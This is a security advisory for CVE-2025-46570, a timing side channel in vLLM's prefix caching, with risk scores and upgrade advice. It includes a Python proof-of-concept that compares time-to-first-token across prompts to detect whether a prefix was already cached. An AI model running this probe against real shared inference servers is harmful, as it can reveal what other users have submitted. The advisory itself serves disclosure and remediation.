CVE-2025-46570

Low risk · Published 2025-05-29

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PagedAttention mechanism finds a matching prefix chunk in its cache, the prefill stage completes faster, which is visible in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be detected and exploited as a side channel. This issue has been patched in version 0.9.0.
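To illustrate the side channel, the minimal sketch below (an illustration, not taken from the advisory) measures TTFT for two prompts that share a long prefix against a vLLM OpenAI-compatible endpoint; the server URL and model name are assumptions. On vulnerable versions, the second request's prefill is faster because the shared prefix chunks are already cached.

import time
import requests

BASE_URL = "http://localhost:8000/v1/completions"  # assumed local vLLM server
MODEL = "example-model"  # hypothetical model name

def measure_ttft(prompt: str) -> float:
    """Seconds from sending the request to the first streamed chunk (~TTFT)."""
    payload = {"model": MODEL, "prompt": prompt, "max_tokens": 1, "stream": True}
    start = time.perf_counter()
    with requests.post(BASE_URL, json=payload, stream=True, timeout=60) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:  # first non-empty SSE line marks the first token's arrival
                return time.perf_counter() - start
    return float("inf")

if __name__ == "__main__":
    prefix = "System: you are a helpful assistant. " * 50  # long shared prefix
    cold = measure_ttft(prefix + "Question A")  # prefill computed from scratch
    warm = measure_ttft(prefix + "Question B")  # shared prefix chunks now cached
    print(f"cold TTFT: {cold:.4f}s, warm TTFT: {warm:.4f}s")
    # On versions before 0.9.0, a measurably lower warm TTFT reveals that the
    # prefix was already cached, i.e., that someone had submitted it before.

The timing gap grows with prefix length, which is why the sketch repeats the system line many times.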

Do I need to act?

- 0.18% chance of exploitation: EPSS score indicates low exploit probability
- Not on CISA KEV list: no confirmed active exploitation reported to CISA
- Patched in version 0.9.0: upgrade vLLM to 0.9.0 or later, and consult vendor advisories for further mitigation guidance (a quick version check is sketched after this list)
- CVSS 2.6/10 (Low): network attack vector, high attack complexity
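As a quick local check, the minimal sketch below (not part of the advisory) compares the installed vllm package version against the patched 0.9.0 release. It assumes Python 3.8+ and the third-party packaging library.

# Minimal sketch: flag an installed vLLM older than the patched 0.9.0 release.
from importlib.metadata import PackageNotFoundError, version
from packaging.version import Version

try:
    installed = Version(version("vllm"))
    if installed >= Version("0.9.0"):
        print(f"vllm {installed}: patched against CVE-2025-46570")
    else:
        print(f"vllm {installed}: vulnerable, upgrade to 0.9.0 or later")
except PackageNotFoundError:
    print("vllm is not installed in this environment")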

Affected Products (1)

- vLLM (versions prior to 0.9.0)

Affected Vendors

- vLLM project

Risk score: 16/100 (low-risk)

- Severity: 10/34 · Low
- Exploitability: 1/34 · Minimal
- Exposure: 5/34 · Minimal